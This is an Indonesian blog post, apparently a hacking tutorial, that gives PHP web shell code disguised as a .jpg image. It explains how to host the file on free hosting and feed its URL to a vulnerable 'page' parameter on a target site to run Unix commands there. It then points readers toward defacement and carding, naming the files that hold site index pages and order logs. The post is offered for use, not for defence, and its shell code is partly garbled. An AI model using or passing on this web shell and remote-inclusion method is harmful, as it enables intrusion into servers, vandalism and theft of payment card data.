1. - Hosting file(Yg gratisan jg banyak. Contoh : Geocities , Ripway, dll)
2. - Lagu2 Linkin Park, Blink 182, My Chemical Romance buat nemenin aksi jahanam kamu
Oke, copy paste script berikut
Code:
<font face=verdana size=7></font>
<center>CMD - SystemCommand
</center><font face=Verdana size=1>
# CMD PHP :
# Re-DESIGN by : Bagus Hacks A.K.A B-479
<hr></hr>
<font face=Verdana size=1>// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", ">", str_replace("
$output));
?>
</font>
<hr></hr>
<font face=Verdana size=1></font>
Bagus Hacks | Muslim Hacker | TeaMpOisoN | Anoymous |
</font>
Kalo udah, save dng nama CMD dan format .jpg . Lalu upload ke hosting kamu. (Yg grtisan jg banyak, udh di bahas di atas) Setelah saya upload, nanti saya akan mendapat URL seperti berikut:
http://www.geocities/n4is3n/cmd.jpg
Setelah itu cari target (Ini membutuhkan kesabaran tingkat tinggi)
Setelah ketemu, contoh:
http://www.target.com/main.php?page=article
Nah, kamu ubah URL-nya jd
.http://www.target.com/main.php?page=http://www.geocities/n4is3n/cmd.jpg&cmd=<perintah unix="" disini=""></perintah>
Lalu eksekusi URL tsb! contoh:
.http://www.target.com/main.php?page=http://www.geocities/n4is3n/cmd.jpg&cmd=ls -l
dan liat hasil-nya... browser akan menampilakan semua direktori yg ada di server sesuai perintah UNIX tadi (ls -l adalah perintah untuk melihat isi direktori beserta
permission-nya).
Untuk defacing atau carding, kamu bisa mengexplore lbh jauh lg...
Oke...oke... saya kasih kata kunci-nya:
untuk deface = "index.html, index.php, index.htm"
untuk carding = "orderlog.txt, order.php"
Semua ada di server, tinggal bagaimana cara kamu menemukan-nya :D
so... Happy Hacking!
0 komentar:
Posting Komentar